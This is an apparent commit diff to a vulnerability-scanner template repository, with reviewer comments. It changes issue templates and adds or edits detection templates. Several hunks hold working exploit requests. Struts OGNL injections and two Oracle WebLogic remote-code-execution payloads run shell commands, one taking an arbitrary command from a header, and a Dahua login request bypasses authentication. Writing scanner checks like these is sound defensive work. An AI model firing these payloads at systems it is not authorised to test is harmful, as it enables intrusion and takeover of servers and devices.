Noam Rathaus 2021-10-21 08:32:04 +03:00
commit fde188d253
113 changed files with 697 additions and 146 deletions

@ -1,32 +0,0 @@
---
name: Bug report
about: Create a issue to help us improve
title: "[Bug] "
labels: ''
assignees: ''
---
**Nuclei version**
```
nuclei -version
```
**Nuclei template version**
```
cat ~/.nuclei-config.json
```
**Describe the bug**
A clear and concise description of what the bug is.
**Commands to reproduce**
```
nuclei -t xxx -target xxx
```
**Screenshots**
If applicable, add screenshots to help explain your problem.
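Review bot: deleting bug_report.md is reasonable since issue-report.md, added later in this commit, takes its place, but the old template prompted for `nuclei -version` and `cat ~/.nuclei-config.json` while the replacement only asks for a description. Keep a version prompt in the new template (false-positive.md does this with `### Nuclei Version:`), because triaging a template issue almost always starts with the engine and template versions.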

.github/ISSUE_TEMPLATE/config.yml vendored Normal file
@ -0,0 +1,14 @@
blank_issues_enabled: false
contact_links:
- name: Ask an question / advise on using nuclei-templates
url: https://github.com/projectdiscovery/nuclei-templates/discussions/categories/q-a
about: Ask a question or request support for using nuclei-templates
- name: Share idea / feature to discuss for nuclei-templates
url: https://github.com/projectdiscovery/nuclei-templates/discussions/categories/ideas
about: Share idea / feature to discuss for nuclei-templates
- name: Connect with PD Team & Community (Discord)
url: https://discord.gg/projectdiscovery
about: Connect with PD Team & Community for direct communication
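Review bot: two wording slips in the contact link names: `Ask an question / advise` should read `Ask a question / advice`, and the `about:` of the ideas link just repeats its `name:`. A one-line hint on when to open a Discussion rather than an issue would help first-time reporters more than a duplicated title.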

@ -1,30 +1,24 @@
---
name: False Positive
about: 'Create an issue if you found false positive results. '
title: "[false-positive] template-name "
about: 'Issue for template producing false positive results.'
labels: 'false-positive'
assignees: ''
---
**Nuclei version**
<!-- ISSUES MISSING IMPORTANT INFORMATION MAY BE CLOSED WITHOUT INVESTIGATION. -->
```
nuclei -version
```
### Nuclei Version:
**Nuclei template version**
<!-- You can find current version of nuclei with "nuclei -version" -->
```
cat ~/.nuclei-config.json
```
### Template file:
**Template ID**
<!-- Template producing false-positive results, for example: "cves/XX/XX.yaml" -->
Please submit the ID template producing false-positive results.
### Command to reproduce:
**Commands to Reproduce**
<!-- Please include the command to replicate the behavior so fix can be applied asap. -->
<!-- if host information can not be shared publicly, please reach out to us on discord server in DM -->
```
nuclei -t template_id -target ?
```
### Anything else:
<!-- Links? References? Screnshots? Anything that will give us more context about the issue that you are encountering! -->
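Review bot: `Screnshots` in the final comment should be `Screenshots`. The comment above `Template file:` asks for a path such as `cves/XX/XX.yaml`, while the reproduce example reads `nuclei -t template_id`; `-t` takes a template path, so writing the example as `-t cves/XX/XX.yaml` keeps the two consistent and avoids reporters pasting an `id:` value there.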

@ -1,16 +1,18 @@
---
name: Feature request
about: Suggest an idea to improve nuclei templates
title: "[Feature] "
labels: ''
assignees: ''
about: Request feature to implement in this project
labels: 'Type: Enhancement'
---
**Is your feature request related to a problem? Please describe.**
<!--
1. Please make sure to provide a detailed description with all the relevant information that might be required to start working on this feature.
2. In case you are not sure about your request or whether the particular feature is already supported or not, please start a discussion instead.
3. GitHub Discussion: https://github.com/projectdiscovery/nuclei-templates/discussions/categories/ideas
4. Join our discord server at https://discord.gg/projectdiscovery to discuss the idea on the #nuclei-templates channel.
-->
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
### Please describe your feature request:
<!-- A clear and concise description of feature to implement -->
**Describe the solution you'd like**
A clear and concise description of what you want to happen.
### Describe the use case of this feature:
<!-- A clear and concise description of the feature request's motivation and the use-cases in which it could be useful. -->

.github/ISSUE_TEMPLATE/issue-report.md vendored Normal file
@ -0,0 +1,21 @@
---
name: Issue report
about: "Issue to report invalid template"
labels: 'Type: Bug'
---
<!--
1. Please search to see if an issue already exists for the bug you encountered.
2. For support requests, FAQs or "How to" questions, please use the GitHub Discussions section instead - https://github.com/projectdiscovery/nuclei-templates/discussions or
3. Join our discord server at https://discord.gg/projectdiscovery and post the question on the #nuclei-templates channel.
-->
<!-- ISSUES MISSING IMPORTANT INFORMATION MAY BE CLOSED WITHOUT INVESTIGATION. -->
### Issue description:
<!-- A concise description of what you're experiencing. -->
### Anything else:
<!-- Links? References? Screnshots? Anything that will give us more context about the issue that you are encountering! -->
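Review bot: item 2 of the guidance comment ends with a dangling `or` before the line break, and `Screnshots` in the last comment should be `Screenshots`. Unlike false-positive.md, this template has no prompt for the nuclei version or the template ID, which are the first two facts needed to triage an invalid-template report; consider adding the same `### Nuclei Version:` and `### Template file:` sections.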

@ -1,15 +1,23 @@
---
name: Submit Template
about: Submit nuclei template using issue
title: "[nuclei-template] template-name"
name: Template Contribution
about: Contributing nuclei template using GitHub Issue
labels: 'nuclei-template'
assignees: ''
---
**Template Details**
### Template Information:
<!-- Include basic information of the template including reference -->
<!-- Templates without any reference mostly likely to take more time for review/validation -->
### Nuclei Template:
<!-- Include nuclei template in between code block shared below -->
```yaml
nuclei template goes here
```
<!-- Include template results if available or redacted valid response snippet of valid match -->
<!-- Example response help us to update the matchers as unique as possible to avoid possible false-positive results. -->
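Review bot: `Templates without any reference mostly likely to take more time` should read `are most likely to take more time`. The two trailing comments asking for a redacted response snippet are the most useful part of the form for writing tight matchers; give them their own `### Example response:` heading so contributors treat it as a requested field rather than a footnote.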

@ -14,8 +14,3 @@ tags:
# files is a list of files to ignore template execution
# unless asked for by the user.
files:
- "token-spray/"
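Review bot: per the hunk header five lines leave this block, which looks like the `token-spray/` entry being dropped from the ignore list; that is consistent with the `self-contained: true` additions to the token-spray templates later in this commit. Since those templates send the supplied token to third-party APIs, please confirm in the commit message whether they now run in a plain `nuclei -t` run of the whole repository, and if so say so in the token-spray README, so users are not surprised by outbound requests to API hosts from a scan that was not aimed at them.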

@ -11,25 +11,19 @@ info:
requests:
- raw:
- |
GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept: */*
Accept-Language: en
- |
GET /login.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept: */*
Accept-Language: en
- |
GET /index.action?§params§%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept: */*
Accept-Language: en
payloads:
params:
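Review bot: the `§params§` to `{{params}}` change moves the three raw requests to the current payload placeholder syntax and changes nothing else about them. Worth running `nuclei -validate -t` on the file and grepping the repository for any remaining `§` placeholders so the old syntax is retired in one commit rather than piecemeal.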
@ -40,11 +34,12 @@ requests:
matchers-condition: and
matchers:
- type: status
condition: or
status:
- 200
- 400
condition: or
- type: regex
part: body
regex:
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
part: body

@ -91,15 +91,16 @@ requests:
- webviewer
- welcome
attack: sniper
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
condition: and
words:
- "environment variable"
- "display library search paths"
condition: and

@ -22,14 +22,16 @@ requests:
payloads:
ids: helpers/wordlists/numbers.txt
attack: sniper
threads: 50
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<title>Dashboard</title>"

@ -0,0 +1,32 @@
id: CVE-2019-2729
info:
name: Oracle WebLogic Server Administration Console Handle RCE
author: igibanez
severity: critical
description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-2729
tags: cve,cve2019,oracle,rce,weblogic
requests:
- raw:
- |
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java><void class="sun.misc.BASE64Decoder"><void method="decodeBuffer" id="byte_arr"><string>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</string></void></void><void class="org.mozilla.classfile.DefiningClassLoader"><void method="defineClass"><string>ResultBaseExec</string><object idref="byte_arr"></object><void method="newInstance"><void method="do_exec" id="result"><string>echo${IFS}9272-9102-EVC|rev</string></void></void></void></void><void class="java.lang.Thread" method="currentThread"><void method="getCurrentWork" id="current_work"><void method="getClass"><void method="getDeclaredField"><string>connectionHandler</string><void method="setAccessible"><boolean>true</boolean></void><void method="get"><object idref="current_work"></object><void method="getServletRequest"><void method="getResponse"><void method="getServletOutputStream"><void method="writeStream"><object class="weblogic.xml.util.StringInputStream"><object idref="result"></object></object></void><void method="flush"/></void><void method="getWriter"><void method="write"><string></string></void></void></void></void></void></void></void></void></void></java>]]></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
matchers-condition: and
matchers:
- type: word
words:
- "CVE-2019-2729"
- type: status
status:
- 200
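Review bot: the `name:` says `Administration Console Handle RCE`, but the request targets `/wls-wsat/CoordinatorPortType` with a `WorkContext` XMLDecoder payload, which is the web-services deserialization issue; the console `handle=` RCE is the template in the next hunk (`/console/images/%252e%252e%252fconsole.portal`). Rename it to describe the wls-wsat XMLDecoder path and add a `reference:` entry (for example `https://nvd.nist.gov/vuln/detail/CVE-2019-2729`, the form the other CVE templates in this commit use). The matcher design is sound: it looks for the literal `CVE-2019-2729`, which only appears in the response if the `echo ... | rev` command actually ran, so a server that merely reflects the request body cannot produce a match.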

@ -28,8 +28,7 @@ requests:
- |
POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
Host: {{Hostname}}
cmd: §exec§
Connection: close
cmd: {{exec}}
Content-Type: application/x-www-form-urlencoded; charset=utf-8
_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29
@ -41,12 +40,12 @@ requests:
matchers-condition: and
matchers:
- type: regex
condition: or
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
part: body
- type: status
status:

@ -31,11 +31,12 @@ requests:
command:
- "systeminfo" # Windows
- "lsb_release -a" # Linux
attack: sniper
matchers-condition: and
matchers:
- type: regex
condition: or
regex:
- "OS Name:.*Microsoft Windows"
- "Distributor ID:"

@ -22,6 +22,8 @@ requests:
path:
- "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}"
- "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"
skip-variables-check: true
matchers-condition: and
matchers:
- type: status
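Review bot: `skip-variables-check: true` is required here and deserves an inline comment: the SSTI probe `{{228*'98'}}` in both paths uses the same double-brace syntax as nuclei's own variables, so without this flag the engine rejects the template for an unresolved variable. A one-line comment next to it prevents a future cleanup from removing the flag and silently breaking the template.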

@ -0,0 +1,37 @@
id: CVE-2021-20031
info:
name: Sonicwall SonicOS 7.0 - Host Header Injection
author: gy741
severity: medium
description: A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack
reference:
- https://www.exploit-db.com/exploits/50414
- https://nvd.nist.gov/vuln/detail/CVE-2021-20031
metadata:
google-dork: inurl:"auth.html" intitle:"SonicWall"
tags: cve,cve2021,sonicwall,redirect
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-20031
cwe-id: CWE-601
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{randstr}}.tld
matchers-condition: and
matchers:
- type: word
words:
- 'https://{{randstr}}.tld/auth.html'
- 'Please be patient as you are being re-directed'
part: body
condition: and
- type: status
status:
- 200
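Review bot: the description does not match the rest of the template: `name:` says SonicOS 7.0, the text says `Sonicwall NAS, SonicWall Analyzer version 8.5.0`, and the last sentence stops mid-phrase at `during various other attack`. Trim it to what the check actually demonstrates (the `Host: {{randstr}}.tld` value reflected into the `auth.html` redirect link) and let the two references carry the rest. The matcher itself is good: requiring both the reflected `https://{{randstr}}.tld/auth.html` and the redirect wording keeps generic Host reflections from matching.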

@ -0,0 +1,54 @@
id: CVE-2021-33044
info:
name: Dahua IPC/VTH/VTO devices Authentication Bypass
author: gy741
severity: critical
description: The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
reference:
- https://github.com/dorkerdevil/CVE-2021-33044
- https://nvd.nist.gov/vuln/detail/CVE-2021-33044
- https://seclists.org/fulldisclosure/2021/Oct/13
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-33044
cwe-id: CWE-287
tags: dahua,cve,cve2021,auth-bypass
requests:
- raw:
- |
POST /RPC2_Login HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/javascript, */*; q=0.01
Connection: close
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://{{Hostname}}/
Referer: http://{{Hostname}}/
{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "true"
- "id"
- "params"
- "session"
condition: and
extractors:
- type: regex
group: 1
part: body
regex:
- ',"result":true,"session":"([a-z]+)"\}'
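Review bot: in the word matcher, `id`, `params` and `session` are generic JSON-RPC keys that also appear in the request body itself and in an error reply to it, so `true` is the only discriminating word; match on `"result":true` directly, as the extractor regex already does, and keep the status check. Also verify the `[a-z]+` character class in the extractor against a real session value: if the device issues session strings containing digits or uppercase letters the extractor silently yields nothing while the matcher still reports a hit.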

@ -1,4 +1,5 @@
id: grafana-default-login
info:
name: Grafana Default Login
author: pdteam
@ -26,7 +27,6 @@ requests:
username:
- admin
- admin
password:
- prom-operator
- admin
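Review bot: removing the duplicated `admin` from the `username` payload list is the right call: each duplicate multiplies the login attempts per target, which for a default-credential template means more noise in the target's authentication logs and a higher chance of tripping account lockout. Worth a sentence in the commit message so the behaviour change (fewer requests per host) is recorded.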
@ -35,15 +35,13 @@ requests:
matchers:
- type: word
words:
- grafana_session
- "grafana_session" # Login cookie
part: header
# Check for 'grafana_session' cookie on valid login in the response header.
- type: word
words:
- Logged in
part: body
# Check for valid string on valid login.
words:
- "Logged in" # Logged in keyword
- type: status
status:

@ -20,15 +20,13 @@ requests:
username:
- admin
attack: sniper
matchers-condition: and
matchers:
- type: word
condition: and
words:
- '"redirect": "/htdocs/pages/main/main.lsp"'
- '"error": ""'
condition: and
- type: status
status:

@ -18,22 +18,21 @@ requests:
payloads:
password:
- 12345
attack: sniper
- "12345"
matchers-condition: and
matchers:
- type: word
condition: and
words:
- "session_id="
- "resource"
condition: and
- type: word
words:
- "Invalid Password"
part: body
negative: true
words:
- "Invalid Password"
- type: status
status:
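Review bot: quoting `"12345"` is the right fix: an unquoted `12345` is parsed by YAML as an integer, so the payload value depends on how the engine stringifies it, and passwords such as `0123` or `1e5` would be silently altered by the same parsing. Moving `negative: true` ahead of `words:` is cosmetic, but it does make the negated matcher easier to spot when reading the list.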

@ -0,0 +1,23 @@
id: alienVault-usm
info:
name: AlienVault USM
author: dhiyaneshDK
severity: info
tags: panel
metadata:
shodan: 'http.title:"AlienVault USM"'
requests:
- method: GET
path:
- '{{BaseURL}}/ossim/session/login.php'
matchers-condition: and
matchers:
- type: word
words:
- '<title>AlienVault USM'
- type: status
status:
- 200
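Review bot: the `id:` is `alienVault-usm` with a capital V, while every other template added in this commit uses an all-lowercase id (`sql-monitor`, `codian-mcu-login`, `samsung-printer-detect`). Change it to `alienvault-usm` before merge; ids end up in users' output and `-id` filters, and renaming after release breaks those.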

@ -0,0 +1,23 @@
id: exsi-system
info:
name: ESXi System
author: dhiyaneshDK
severity: info
tags: panel
metadata:
shodan: 'html:"esxUiApp"'
requests:
- method: GET
path:
- '{{BaseURL}}/ui/#/login'
matchers-condition: and
matchers:
- type: word
words:
- 'ng-app="esxUiApp"'
- type: status
status:
- 200
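Review bot: `id: exsi-system` is a typo for `esxi-system` (the `name:` says ESXi System and both the Shodan query and the matcher use `esxUiApp`). Fix it now for the same reason as the other ids in this commit: once merged, the id becomes part of users' filters and output.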

@ -0,0 +1,24 @@
id: samsung-printer-detect
info:
name: SAMSUNG Printer Detection
author: pussycat0x
severity: info
tags: iot,panel
metadata:
fofa-dork: 'app="SAMSUNG-Printer"'
requests:
- method: GET
path:
- "{{BaseURL}}/sws/index.html"
matchers-condition: and
matchers:
- type: word
words:
- '<title> SyncThru Web Service </title>'
- type: status
status:
- 200

@ -0,0 +1,23 @@
id: sql-monitor
info:
name: SQL Monitor
author: dhiyaneshDK
severity: info
tags: panel
metadata:
shodan: 'html:"SQL Monitor"'
requests:
- method: GET
path:
- '{{BaseURL}}/Account/LogIn?returnUrl=%2F&hasAttemptedCookie=True'
matchers-condition: and
matchers:
- type: word
words:
- '<p>JavaScript needs to be enabled for SQL Monitor to work properly.</p>'
- type: status
status:
- 200

@ -36,6 +36,7 @@ requests:
- "{{BaseURL}}/.github/workflows/ci-daily.yml"
- "{{BaseURL}}/.github/workflows/ci-issues.yml"
- "{{BaseURL}}/.github/workflows/smoosh-status.yml"
- "{{BaseURL}}/.github/workflows/snyk.yml"
matchers-condition: and
matchers:

@ -0,0 +1,29 @@
id: gruntfile-exposure
info:
name: Gruntfile Exposure
author: sbani
severity: info
reference: https://gruntjs.com/sample-gruntfile
tags: config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/Gruntfile.js"
- "{{BaseURL}}/Gruntfile.coffee"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
condition: and
words:
- "module.exports"
- "grunt"
- type: status
status:
- 200

@ -0,0 +1,24 @@
id: jetbrains-datasource
info:
name: Jetbrains IDE DataSources exposure
author: FlorianMaak
severity: info
description: Contains uuid of datasource to retrieve via .idea/dataSources/{uuid}.xml to expose database structure.
tags: config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/.idea/dataSources.xml"
matchers-condition: and
matchers:
- type: word
words:
- "DataSourceManagerImpl"
part: body
- type: status
status:
- 200

@ -0,0 +1,32 @@
id: prometheus-config-endpoint
info:
name: Prometheus config API endpoint
author: geeknik
severity: info
description: The config endpoint returns the loaded Prometheus configuration file. This file also contains addresses of targets and alerting/discovery services alongside the credentials required to access them. Usually, Prometheus replaces the passwords in the credentials config configuration field with the placeholder <secret> (although this still leaks the username).
reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/
tags: prometheus,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/api/v1/status/config"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'job_name:'
- '{"status":"success","data":'
- 'targets:'
condition: and
- type: word
part: header
words:
- 'application/json'

@ -0,0 +1,37 @@
id: prometheus-flags-endpoint
info:
name: Prometheus flags API endpoint
author: geeknik
severity: info
description: The flags endpoint provides a full path to the configuration file. If the file is stored in the home directory, it may leak a username.
reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/
tags: prometheus,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/api/v1/status/flags"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '"data":'
- '"config.file":'
condition: and
- type: word
part: header
words:
- 'application/json'
extractors:
- type: regex
name: web_admin_enabled
regex:
- '\"web\.enable\-admin\-api\"\: \"true\"'
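Review bot: the `web_admin_enabled` extractor regex requires a space after the colon (`\: \"true\"`), but the API answers with compact JSON: the matcher a few lines above and the config and targets templates in this same commit all expect `{"status":"success","data":` with no spaces, so this extractor will not fire against a real response. Use `"web\.enable-admin-api":\s*"true"`; the `\"`, `\-` and `\:` escapes are unnecessary in a single-quoted YAML scalar and only make the pattern harder to read.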

@ -0,0 +1,31 @@
id: prometheus-targets-endpoint
info:
name: Prometheus targets API endpoint
author: geeknik
severity: info
description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, oftentimes without the developers knowledge.
reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/
tags: prometheus,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/api/v1/targets"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '{"status":"success","data":'
- 'Labels'
condition: and
- type: word
part: header
words:
- 'application/json'
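Review bot: in the description, `developers knowledge` should be `developers' knowledge`. The word `Labels` (capital L) is matched case-sensitively, while the description talks about the lowercase `labels` field; if the intent is the per-target `labels` object, match `"labels":` explicitly so the template does not depend on some other key happening to contain `Labels` as a substring.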

@ -15,6 +15,7 @@ requests:
- "{{BaseURL}}/server/storage/"
- "{{BaseURL}}/intikal/storage/"
- "{{BaseURL}}/elocker_old/storage/"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word

@ -23,17 +23,17 @@ requests:
payloads:
path: helpers/wordlists/adminer-paths.txt
attack: sniper
threads: 50
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
condition: and
words:
- "- Adminer</title>"
- "partial(verifyVersion, "
condition: and
- "partial(verifyVersion"
- type: status
status:
- 200

@ -14,12 +14,10 @@ requests:
Host: {{Hostname}}
Origin: {{BaseURL}}
Accept-Language: en-US,en;q=0.9
Connection: close
payloads:
mdbPaths: helpers/wordlists/mdb-paths.txt
attack: sniper
threads: 50
max-size: 500 # Size in bytes - Max Size to read from server response
stop-at-first-match: true

@ -1,4 +1,5 @@
id: prestashop-module-fuzz
info:
name: Prestashop Modules Enumeration
author: meme-lord
@ -16,19 +17,18 @@ requests:
payloads:
path: helpers/wordlists/prestashop-modules.txt
attack: sniper
threads: 50
threads: 50
matchers-condition: and
matchers:
- type: word
condition: and
words:
- "<module>"
- "<name>"
- "<displayName>"
- "<is_configurable>"
- "</module>"
condition: and
- type: status
status:

@ -1,4 +1,5 @@
id: wordpress-plugins-detect
info:
name: WordPress Plugins Detection
author: 0xcrypto
@ -13,11 +14,8 @@ requests:
payloads:
pluginSlug: helpers/wordlists/wordpress-plugins.txt
attack: sniper
threads: 50
redirects: true
max-redirects: 1
threads: 50
matchers-condition: and
matchers:
- type: status
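Review bot: per the hunk header this block shrinks by three lines; if `redirects: true` and `max-redirects: 1` are among them, behaviour changes: a plugin path that answers with a 301 (trailing-slash canonicalisation, http to https) is now seen as a non-200 by the status matcher below and the plugin goes undetected. If the intent is only to move `threads: 50`, keep the redirect settings; if dropping them is deliberate, say so in the commit message.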

@ -1,4 +1,5 @@
id: wordpress-themes-detect
info:
name: WordPress Theme Detection
author: 0xcrypto
@ -13,11 +14,8 @@ requests:
payloads:
themeSlug: helpers/wordlists/wordpress-themes.txt
attack: sniper
threads: 50
redirects: true
max-redirects: 1
threads: 50
matchers-condition: and
matchers:
- type: status
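Review bot: same concern as for wordpress-plugins-detect: the header shows three lines removed, and if `redirects: true` / `max-redirects: 1` are gone, a theme path that redirects is now reported as a non-200 by the status matcher below. Either keep the redirect settings or note the intentional change in the commit message.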

iot/codian-mcu-login.yaml Normal file
@ -0,0 +1,24 @@
id: codian-mcu-login
info:
name: Codian MCU Login
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7404
tags: iot
metadata:
shodan: 'http.title:"Codian MCU - Home page"'
requests:
- method: GET
path:
- '{{BaseURL}}/login.html'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Codian MCU - login:</title>'
- type: status
status:
- 200

iot/envision-gateway.yaml Normal file
@ -0,0 +1,24 @@
id: envision-gateway
info:
name: EnvisionGateway
author: dhiyaneshDK
severity: low
reference: https://www.exploit-db.com/ghdb/7315
tags: iot
metadata:
shodan: 'http.title:"EnvisionGateway"'
requests:
- method: GET
path:
